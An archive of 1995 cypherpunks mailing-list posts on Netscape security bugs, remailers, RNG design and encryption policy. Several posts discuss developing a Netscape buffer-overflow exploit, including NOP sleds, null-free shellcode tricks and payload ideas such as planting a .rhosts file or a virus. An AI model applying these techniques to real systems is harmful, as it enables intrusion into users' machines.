0xefbfbc40:     nop    
 
3) exploit code that calls the kernel syscall() with SYS_exit
  (benign exploit, causes your browser to exit)

The problem? To make a syscall under BSDI2.0, I have to execute
an lcall 0x7,0x0 with 1,0 on the stack. However, to exploit the netscape
bug, you can not embed 0x0 in the URL. No problem I thought, I searched
Netscape's executable for any kernel calls, and found an lcall 0x7,0x0
at 0x257fee. But I can't do a 32-bit direct jump without a zero,
in the instruction (the 32-bit address is 0x00257fee), and I can't
do a relative jump from 0xefbfbc30+ 

If you can come up with some 386 assembly under BSDI2.0 which can
invoke syscall() in the kernel without any embedded 0x0 bytes
in the code, you can share a Hack Netscape T-Shirt with me.

If it turns out to be too hard under BSDI, I'll gladly assist
in producing exploits for Windows or another operating system.

One trick I thought up for embedding zeros in the code is to self-modify
the code using XOR ADDRESS,ADDRESS where ADDRESS is a byte on the stack
within the code.

Anyone have any better ones?

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 17:28:10 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for OS/2, when? (Re: Another Netscape Bug)
In-Reply-To: <199509261223.JAA01800@bud.peinet.pe.ca>
Message-ID: <44a4kt$jda@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509261223.JAA01800@bud.peinet.pe.ca>, sentiono@cycor.ca (Sentiono Leowinata) writes:
> On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote:
> 
> >> It's not an exploit script, but you can find an auto crash "animation"
> >> for Ray's discovered bug on 
> >>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
> >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
> >Crashes the 16-bit Windows version 1.1N.
> >DCF
> 
> Same here. For more information (not Netscape related), Web Explorer
> 1.02 for OS/2 also crashes for the long URL.
> I wish Netscape will port it to OS/2 (already ask them, but no comment
> from Netscape). I don't try it on Netscape 1.1N as it doesn't run
> reliably under Win-OS/2 (10 min -> crash! ;)

  My understanding is that OS/2 is supposed to be windows compatible,
as in "better Windows than Windows".  If our windows app doesn't run
on OS/2, then isn't it IBM's bug, not ours?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Tue, 26 Sep 95 21:09:20 PDT
To: cypherpunks@toad.com
Subject: PGP and FBI?
Message-ID: <199509270409.AAA00688@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



There's some sort of documentary on WBAI 99.5 FM out of NYC now.
They're talking about PGP and right wing militias... the guy being
interviewed called PGP a "one time pad system" and doesn't understand
it... *sigh*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Tue, 26 Sep 95 23:22:02 PDT
To: gorkab@sanchez.com (Brian Gorka)
Subject: Re: Windows MixMaster Client
In-Reply-To: <00996F95DAD78CE0.0000381E@sanchez.com>
Message-ID: <199509270632.AAA01325@zeezrom.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone out there have a windows mixmaster client?  (or a pointer to one?)

There are none.

> Also, I am having a LOT of grief trying to get the alpha.c2.org  remailer to
> work for me... (yes, I have the help files)

> Could someone walk me through it? 

You mean the nym server at alpha.c2.org? It seems to have about a 1 week
delay on it...
 
Be sure the reply block that you give it is your own, and that you tell
alpha which remailer the reply block goes to.

Don



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 00:36:08 PDT
To: cypherpunks@toad.com
Subject: Hack Microsoft At Work Fax?
Message-ID: <199509270735.AAA23328@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been helping a client install Microsoft Windows for Workgroups,
which comes with Microsoft At Work Fax.  The fax software, in addition
to doing normal stuff, lets you encrypt faxes with passwords or public-key
encryption for sending to other people who use the same software.
The manual has minimal technical information, so I don't know the algorithms
it uses; it mostly talks about what GUI buttons to push.  

I was hoping the section on taking your software overseas would say
something about Export Laws and International Arms Traffickin' (and
creatin' a disturbance...) but all it said was how to set the
international-direct-dialing phone codes
so you can get your fax to go where you want.  Because of that, I'm guessing 
it's something like RC4/40 and RSA-512 with some sort of user name as part of 
the public key field, but I'd like to know more, and I'm also guessing that 
they've got some sort of general export license permission from the Feds.

The public-key system uses a public key file with "154 computer-generated 
characters", and recommends exchanging public keys by floppy disk.  
I don't know if that's 154*8 bits, or 154*6 or *4, or if there's a user-name
string using up some of those characters; probably the latter since it's
probably 512 bits because of export.

I called the usually helpful Microsoft Technical Support phone number,
and they were friendly and will try to get back to me, but this is
way out of the scope of the kind of questions they're used to :-)
And the stuff I could find from the Web page or ftp.microsoft.com
on encryption had less than the manual, plus some stuff on password
encryption, plus some stuff on their RAS remote network access stuff
which apparently uses DES as well as standard PPP handshaking or
Shiva handshaking.

Does anybody have any more information?  It'd be fun to hit up Microsoft
for the next crack if it's weak enough; the fax stuff can also be sent by MSMail
so there is eavesdropping potential.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 27 Sep 95 00:45:16 PDT
To: Frank A Stevenson <frank@funcom.no>
Subject: Re: netscape NSRANDFILE compatible with /dev/random ?
In-Reply-To: <Pine.SGI.3.91.950927082835.1586B-100000@odin>
Message-ID: <9509270040.ZM150@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 27,  8:32am, Frank A Stevenson wrote:
> Subject: netscape NSRANDFILE compatible with /dev/random ?
> 
> What happens if NSRANDFILE is set to /dev/random ?
> will netscape try to read an infinite number of random bytes ?

  In the current patch it will read up to 1 megabyte before stopping.
In 2.0 I will add a way to specify a size.  As a temporary hack you
could use 'dd' to get the number of bytes you want into a file, then
remove the file once netscape had started up.

	--Jeff



-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 17:50:03 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape RNG
In-Reply-To: <199509250649.CAA27099@clark.net>
Message-ID: <44a728$jda@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.LNX.3.91.950926072411.866D-100000@russell.moore.com>, drc@russell.moore.com (David R. Conrad) writes:
> I also noticed that they use $HOME/.pgp/randseed.bin under unix, but
> they don't bother with %PGPPATH%\RANDSEED.BIN on PCs.  I've sent Jeff
> a private message about this.

  As noted in a previous message, I've replaced the hardcoded randseed.bin
with an environment variable that names a file to pass through the seed
hash.  This is only on the unix version for now, but I plan to put it
into the PC version for 2.0.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 18:01:01 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <44a7mr$jda@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251741.KAA04656@infinity.c2.org>, sameer@c2.org (sameer) writes:
> 	The really big sticking point I see, however, is the
> certification authorities. There is a single point of failure here and
> that is at Verisign. This becomes a large problem I think if the
> encrypted email that Netscape does requires personal x509 certificates (I
> read that Verisign is issuing those for $9/each.) This is a problem
> because for one thing I don't think Verisign will want to issue certs
> to pseudonyms, and Netscape may not talk encrypted email to
> non-certified people. (I am not sure)

  I believe that the identities of free certificates that verisign plans
to offer to netscape customers will not be checked in any way other than
to ensure that the name is unique for that CA.  You will have to ask
someone from Verisign to get a certain answer.

> 	The solution to this, of course, is to allow Navigator to
> accept alternate certification hierarchies, so we can setup a
> Cypherpunks cert agency or a c2.org cert agency, which -will- sign
> nym's keys, etc. The question exists though, as to whether or not
> Netscape will allow for alternate agencies in Navigator.

  I have stated here, and in other public forums, several times in the
past few months, that Netscape Navigator 2.0 will support user configurable
certificate authorities.  You will be able to specify that you do or
do not trust specific server certificates and certificate authorities.
The user will be able to incorporate new CA certificates into their
certificate database, and mark them as trusted for signing certs for
SSL, email, etc.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 27 Sep 95 01:49:30 PDT
To: cypherpunks@toad.com
Subject: testab
Message-ID: <199509270848.BAA14286@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


testab







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 27 Sep 95 01:50:57 PDT
To: cypherpunks@toad.com
Subject: testab
Message-ID: <199509270849.BAA14441@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


testab







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Sep 95 22:54:18 PDT
To: "James Caldwell" <jcaldwel@iquest.net>
Subject: Re: Yet Another Alarmist TV Show About Child Molesters on the Ne
In-Reply-To: <m0sxorl-00032TC@dorite1.iquest.net>
Message-ID: <199509270554.BAA17087@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



That's the weirdest statement about the dialectic I've ever heard -- it
bears no resemblance to what the man was talking about
whatsoever. Hegel was discussing a theory of how historical changes
occur, not suggesting a way to achieve change. You also have his dates
wrong -- 200 years too early. The comment also had nothing whatsoever
to do with the topic of this mailing list.

.pm

"James Caldwell" writes:
> On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote:
> 
> It's called the Hegelian Diclectic(sp?) first postulated by William
> Hegel (an ass) in Germany approx the 1600's as a method for social change
> when none could otherwise be achieved.
> 
> > And the trashing will continue.  It is the classic scenario.
> > Feed the media negative press clips about the entity you wish
> > to discredit (here, the Net), e.g.:
> > 1.  All those pedophiles out to lure your children;
> > 2.  Big coverage on catching some of those pedophiles;
> > 3.  First page coverage on breaking Netscape's code with the
> >     headlines that your sensitive information such as your
> >     credit card numbers, etc. can be retrieved (ignoring that
> >     the reason was to show Netscape's poorly structured code
> >     would allow this and, therefore, preventing it before it
> >     could happen);
> > 4.  Expect cryptology to crop up in the Oklahoma bombing trial.
> >     There already have been articles of those involved having
> >     allegedly used that *damned* Net to correspond.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 23:19:34 PDT
To: cypherpunks@toad.com
Subject: Wild Idea for RNG
Message-ID: <199509270619.CAA11744@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




Ok, so I'm reading a message somewhere and I see a message about
algorithmic information theory. Cryptography was recently on my
mind and I thought of Chaitin's quote "arithmetic is random"

So, why not construct a turing machine with a large state transition
table, input a random program, and get a 1 or 0 bit depending on
whether it halts in X number of cycles. You could even get more
than 1 bit out of it by measuring how many cycles it takes to halt
(if it halts before X) and use the LSB. Is it as secure as
the halting problem? (intractable to devise an algorithm used
to predict a bit with more than 50% confidence if you knew the
state table?) 

Ok, so it's impractical.


So how about this:

Grab a picture of the current bitmap on your screen. Run it through
a good compression algorithm (say, an arithmetic/Q-coder or
one of the LZ schemes). Grab the LSB of every 4th byte or so.
If the screen is size 1024*768*8, that's 786432 bytes. Let's assume
a 10 to 1 compression ratio = 78643 bytes. Let's assume you take
1 bit from every 10 byte, that's 983 bits of entropy.

The screen will often contain data like:

random placement of icons and windows
current time
current applications running, and the data in their windows


If Netscape was running for instance, part of the random bits
would come from the bitmap representation of the data in Netscape's
window which would depend on the URL being displayed.


 
-Ray


 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 23:26:40 PDT
To: inglem@adnetsol.com (Mike Ingle)
Subject: Re: Coercion-proof remailers (solved?)
In-Reply-To: <199509270552.WAA00475@cryptical.adnetsol.com>
Message-ID: <199509270626.CAA13654@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




  This idea is similar to an approach I posted a month or so ago
entitled "anonymous name resolution" which uses Shamir sharing
to break up the recipient's address so that there is no first remailer
to coerce.

  The idea is that you should not deliver to e-mail addresses on
the remailer network, but to "handles", these handles will be
distributed across a DNS-like system that splits up the handles
using Shamir sharing. No server stores the handle->email mapping,
but the whole network can perform the mapping. Remailers don't deliver
the message to the final destination, but deliver pieces of the
message to the anonymous name resolver network which perform the
final delivery.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 27 Sep 95 00:50:58 PDT
To: sameer <sameer@c2.org>
Subject: Re: getting netscape to support the remailers
In-Reply-To: <199509261957.MAA20143@infinity.c2.org>
Message-ID: <Pine.SUN.3.90.950927024402.1929A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


As far as I can tell from Netscape's web pages and the Java mailing lists, 
the only way to add to the runtime is with DLLs. Java is only being 
used for applets. And whatever they may say, their scripting language is 
not Java. (An engineer at Sun that worked on getting Java to work for 
Netscape said that Sun had nothing to do with that half cooked scripting 
language).

I for once can wait till HotJava is more stable. You can modify it to 
your heart's content. And learning Java is easy enough.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 26 Sep 1995, sameer wrote:

> 	That was what I was thinking as well. I am confused by
> Netscape's java support though.. I haven't seen very many details. Is
> netscape going to only support applets or can you add stuff to the
> runtime as well? In order to use jcrypt one needs access to add stuff
> to the runtime I believe.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Wed, 27 Sep 95 00:12:22 PDT
To: eb@comsec.com (Eric Blossom)
Subject: Re: Cypherpunks Lite
In-Reply-To: <199509262133.OAA21492@comsec.com>
Message-ID: <199509270704.DAA10591@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Eric Blossom writes:

> I provide a moderated version of the Cypherpunks list called
> "Cypherpunks Lite".[...]

I offer a similar service, with the following provisos:

 o There's no fee (unless you want to donate ecash)
 o No digest format available
 o Approximately the same statistics as Cpunks Lite (5-10% of
   all incoming messages, depending on content)
 o No archives of previous mailings available for public review
   to aid in consumer choice

I call it "Cpunks Frog Forwards". To be added or removed, send
a polite request to the human behind this address.

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 27 Sep 95 01:21:32 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: [NOISE] Re: Easter Eggs
In-Reply-To: <199509261959.MAA28501@desiree.teleport.com>
Message-ID: <Pine.SUN.3.90.950927031557.2286A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Actually there is a limit of 20 cookies per web server.
I will have to check to see if there is a limit on the size of
the cookie. And no, you don't need a Netscape server. It's just another
HTTP header. What about this: downloading an encoded picture
containing graphic description of sex with minors. Would the FBI go around 
checking people's cookie files and busting them?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 26 Sep 1995, Alan Olsen wrote:

> obNetscapeHack:  There is a feature called a "cookie file" in Netscape that
> is ripe for exploitation as a security leak.  If you are using a Netscape
> server (and you may not even need that), you can feed all sorts of
> information into it without the user's knowledge.  I have heard of one page
> that overloads the cookie file until the machine runs out of drive space.  I
> am sure that there are other exploitable holes there...  Any takers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Thu, 28 Sep 95 13:35:32 PDT
To: cypherpunks@toad.com
Subject: Re: STT_???
Message-ID: <m0syPfu-00035EC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 28 Sep 95 at 8:08, John Young wrote:

>    9-28-95. W$Japer:
> 
> 
>    "Infighting Unravels Alliance Seeking Standard to Protect
>    Internet Purchases."

Money, money, money, MONEY!
 
Let's hope Digital cash sans the Corprats takes...
>       The consortium brought together such top players as
>       credit-card rivals Visa International and MasterCard
>       International Inc., software titan Microsoft Corp. and
>       Internet upstart Netscape Communications Corp. But this
>       week, the alliance split because of tensions between
>       Visa and MasterCard and their respective technology
>       partners -- Microsoft and Netscape.

Watch the vultures at Microsoft come to feed:
 
>       Regarding Netscape, Mr. Dent of Microsoft said the
>       firm's security deficiencies that have recently come to
>       light have "tainted" electronic commerce on the
>       Internet. Mr. Dent also noted that Microsoft yesterday
>       introduced new security technology, including means to
>       verify a user's identity, that is much stronger than
>       Netscape's.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 27 Sep 95 02:21:27 PDT
To: Matthew.Sheppard@Comp.VUW.AC.NZ (Matthew James Sheppard)
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <199509260102.NAA09663@bats.comp.vuw.ac.nz>
Message-ID: <199509270920.FAA19713@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Matthew Sheppard writes:
> sameer writes:
> > 	He's -asking- for an exploit. Tshirts to Ray and the person who
> > does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> > have them do one.
> 
> It isn't simple, you need to know the absolute address of where the
> supplied code will be and alter the return address on the stack to
> that address.

> With Netscape 1.1 the state of the stack is much more dynamic, in
> particular the user can be viewing documents at an arbitrary depth in
> the "web tree", each recursion will increase the stack pointer (or
> decrease with some architectures) There is no way of knowing for
> certain where your code will end up and thus no way to reliably alter
> the return address on the stack to execute your arbitrary code.

   Are you sure that Netscape uses an implicit stack for this,
rather than an explicit stack? If they use an explicit stack for
the "web tree", then your argument doesn't apply. In fact, I guess
that they do use an explicit stack, because it makes implementing
the "History" menu which shows the last couple of links much easier.
I guess that they use some sort of "ring" structure which is
a dequeue or plain array, so that after a certain "depth", states
are written over and "scrolled off"

  Also, if they used an implicit stack, all it would do is increase
the uncertainty of where the stack pointer is. However, by
inserting enough NOPs into the exploit code, you can virtually insure
the exploit code will be executed. Even if you are off by 64kbytes,
you can insert 64kbytes of nops which isn't much. My own testing
doesn't bear out your theory. I rarely changed the position of the 
overflowed stack frame by more than 200 (after following 3 nested links
to my exploit link). I included 256-512 nops before my exploit code.


> You could always gamble on popular states, like when the first url
> fetched by the browser.  Also you could direct execution to any
> routine in the netscape binary (with unknown arguments) .  The most
> detrimental offhand would be deleting the bookmarks file (whoopee) And
> with Netscape 2 coming RSN I wouldn't waste too much time.

  How about creating a .rhosts file with your name in it?

  Or, on Windows machines, inserting a virus?

  If an exploit is possible, any exploit is probable, given that a clever
encoding of assembly instructions can be created for any code required.
 
-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 27 Sep 95 02:37:36 PDT
To: cypherpunks@toad.com
Subject: Re: getting netscape to support the remailers
In-Reply-To: <9509261805.AA22239@cs.umass.edu>
Message-ID: <199509270937.FAA20543@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


 
> sameer writes:
> > 	I think that in order to get netscape to support the remailers
> > the remailers will have to:
> > 
> > A) Support S/MIME
> > B) Have a documented protocol, MIME-related
> > 
> > 	Did Ray Cromwell do some work towards MIMEifying the
> > remailers? My impression of his work back when he posted was that it
> > trusted the remailers too much, but perhaps my memory is flawed-- in
> > any case his work may be helpful towards developing a remailer
> > standard, which could then help get support incorporated into
> > MIME agents.

  Yes, a while ago I was working on this, but I dropped it as people
didn't seem interested. It was part of my whole "Remailer 2.0" proposal
(before mixmaster was written)

  I was studying ways to make it easier for mail readers to interact with
remailers, in particular, messages which were split, padded, packetized,
and sent along separate chains. All this without some kind of special 
client. I wanted to use the multipart/partial part of MIME to have
the pieces combined at the recipient end and decoded using an
application/remailer or application/pgp type. (this was also
before PEM was worked on) So I had a lot of work to do in standardizing
stuff. I started working on a remailer which combined those facets,
and also

1) a remailer network which had strong authentication between remailers
so that untrusted remailers could not get in the network (web of trust
for remailers)
2) my virtual handle idea
3) strict addressing for virtual handles on the remailer network
(e.g. set up an explicit chain to anonymous bob by mailing to
remailer1#remailer2#....#remailerN#anonymous_bob. Also, if you add
a '*' in the path, it means for the remailer to choose a random
remailer as the next in the chain)
4) padding, packetizing, delayed delivery, creating artificial traffic to 
   thwart traffic analysis
5) a built in keyserver and "list of active remailers" server. 
   The list of active remailers server would also contain flags
   for each remailer detailing what it supports and special
   flags like if the machine is multiuser, single, firewalled, offline (UUCP 
   connection only), etc. I wanted as standard, that every remailer
   could serve keys or at least tell you what other remailers were active
6) socket connection for commanding the remailer so that you can bypass
   sendmail logging and get error/status on the message
7) direct SMTP delivery bypassing local sendmail logging



I wanted to use multipart MIME to allow remailers in a network
to be run from user accounts in such a way that they wouldn't accidentally get
mail intended for the remailer and they wouldn't have to bear
responsibility for the mail sent (only the whole machine would, as it would
be delivered via SMTP direct, not sendmail, so no local logs)

Nevertheless, like many things, I completed about 60% of it and it got
put on the back burner never to emerge. Mixmaster came along and I 
figured there's no point continuing.

 
-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 27 Sep 95 03:20:22 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: cypherpunks press releases/contact list
In-Reply-To: <199509262341.TAA16602@frankenstein.piermont.com>
Message-ID: <Pine.SUN.3.91.950927061628.29121A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 26 Sep 1995, Perry E. Metzger wrote:

> Who gives a damn, anyway? It's not as though we have a "cypherpunks"
> reputation to uphold.

I don't know about that.  If you read the three WSJ stories on the 
Netscape holes, you find that "Cypherpunks" moves closer to the lead 
'graphs each time.  Soon we'll be the lead.

DCF

"It is to be hoped *not* in a story about major Fibbie crypto busts."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 27 Sep 95 05:13:44 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Netscape Stock Prices
In-Reply-To: <v02120d06ac8e4b588d84@[199.0.65.105]>
Message-ID: <9509271213.AA10200@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
 > >
 > >950809  75.000  53.750  55.500  3851.8
 > :
 > :
 > >950925  69.000  62.250  67.000  684.0     WSJ article re: overflow bug
 > 
 > Actually, Netscape is still the only game in town as far as Wall Street
 > goes.

And of course the fact that a bug in the software is Big News only
makes things better.  I never see any WSJ articles about *my* bugs.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 27 Sep 95 07:38:02 PDT
To: cypherpunks@toad.com
Subject: Using sound cards to accelerate RSA?
Message-ID: <Pine.SOL.3.91.950927072319.1340B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Somebody mentioned the possibility of using the a/d stage of a sound card 
as a source of random bits, and that brought a thought back to mind: 
given that a lot of sound cards are now shipping with DSP chips on board, 
has anyone written any code that uses the card's DSP to accelerate RSA 
processing? 

Maybe there's a mass market for a crypto-blaster- an RNG, 3 or 6 
DES chips, and a DSP. It would make for a killer linux based SHTTP server...

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 27 Sep 95 04:52:01 PDT
To: cypherpunks@toad.com
Subject: HP KEscrew
Message-ID: <199509271151.HAA03534@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, Sept 27, 1995


   Hewlett Lobbies for Its Encryption Plan That Would
   Satisfy Tough Export Rules

   By Don Clark


   Hewlett-Packard Co. is pushing an unusual plan to
   protect electronic transactions around the world
   without running afoul of U.S. export laws.

   The Palo Alto, Calif., computer maker said it has been
   lobbying government agencies for more than a year to
   gain support for its proposal, which uses a
   data-scrambling technology to protect transactions
   from tampering or theft of data. Strong encryption
   technologies ordinarily fall under tough export rules
   that limit technologies which could impede U.S.
   wire-tapping capabilities, a source of continuing
   friction between the government and high-technology
   companies.

   H-P, in a plan developed with the French company
   Gemplus SCA, wants to split the code-making
   technologies into two pieces that would be approved
   under different government standards. One device,
   which could fit in a standard computer, would contain
   a basic encryption capability that is designed to be
   broadly exported without the need to seek a separate
   export license for each foreign user.

   Would Help Industry

   That device, dubbed an encryption engine, would be
   useless without the addition of another tiny piece of
   hardware that contains a code-making formula set at a
   specific strength. The second device, called a policy
   card, would be separately reviewed by the U.S. State
   Department for each customer.

   Government agencies, including codebreakers at the
   National Security Agency, would still have a say over
   the strength of encryption exports. But customers
   could build commercial applications around the
   proposed encryption engine, knowing that it will work
   with any code-making formula that governments might
   adopt in the future. Now they run the risk that their
   work will become obsolete amid policy changes in
   Washington, D.C., and other countries.

   State Department officials weren't immediately
   available for comment. Stewart Baker, a former NSA
   general counsel who now practices law in Washington,
   D.C., termed the H-P plan a clever answer to the
   problem of shifting government policy.

   "There was a lot of skepticism when H-P first proposed
   it," said Lynn McNulty, a former encryption specialist
   at the National Institute of Standards and Technology.
   "But it looks to me that they are well on the way to
   the next step."

   H-P Confident of Approval

   Doug McGowan, an H-P manager involved with the
   project, said he expects to receive U.S. approval by
   next year to begin shipping the encryption engine
   freely to Western Europe and Canada. "We believe we
   will receive relaxed export controls," he said.

   H-P's plan fits some of the NSA's objectives. For one
   thing, its technology embeds encryption technology in
   microchips that can't easily be modified by computer
   hackers or terrorists. H-P's policy cards also could
   be adapted for a controversial Clinton administration
   proposal called key escrow, in which mathematical keys
   to break codes could be stored for later use by law
   enforcement or intelligence agencies, Mr. McGowan
   said.

   The plan complements a parallel H-P effort to develop
   a new generation of "smart" data cards to let
   consumers buy goods and services around the world
   electronically. Gemplus, a huge supplier of credit and
   debit cards in Europe, is supplying technology to that
   effort along with Informix Corp., a database software
   maker in Menlo Park, Calif.

   Jeff Hudson, an Informix vice president, said the
   partners' proposed cards could store money and a
   database worth of personal information, such as
   medical records. That approach could eliminate the
   need to connect to multiple companies or agencies to
   manage such information, since it would be stored on
   each card, the companies said.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 27 Sep 95 05:03:00 PDT
To: cypherpunks@toad.com
Subject: SSTarget
Message-ID: <199509271202.IAA04464@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, Sept 27, 1995


   Microsoft and Visa Expected to Unveil Internet Technology

   By a WSJ Staff Reporter


   New York -- Microsoft Corp. and Visa International are
   expected to disclose details today of their technology for
   protecting commerce on the Internet.

   The software company and bank clearinghouse have been
   working since last November on a plan for protecting
   credit-card numbers and other financial data from crooks, a
   major obstacle to the widespread use of computer networks
   for buying goods and services. As the largest players in
   software and credit cards, Microsoft and Visa wield
   considerable clout among a crowd of companies vying to set
   electronic-security standards.

   Their proposed specifications, called Secure Transaction
   Technology, or STT, is partly based on a data-encryption
   technology popularized by RSA Data Security Inc., a closely
   held company in Redwood City, Calif.

   Other key players in the Internet-security race include
   MasterCard International Inc., the other name in bank
   cards, and Netscape Communications Corp., a leader in
   Internet software that has suffered some highly publicized
   security lapses lately. MasterCard announced plans to
   collaborate with Visa on security technology in June, but
   isn't expected to take part in the latest Visa-Microsoft
   announcement.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Wed, 27 Sep 95 05:18:34 PDT
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: Wild Idea for RNG
Message-ID: <199509271218.IAA07658@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


Warning: I'm no expert, my response is just a semi-informed opinion
(emphasis on "semi-").

At 02:19 1995.09.27 -0400, Ray Cromwell wrote:
>So, why not construct a turing machine with a large state transition
>table, input a random program, and get a 1 or 0 bit depending on
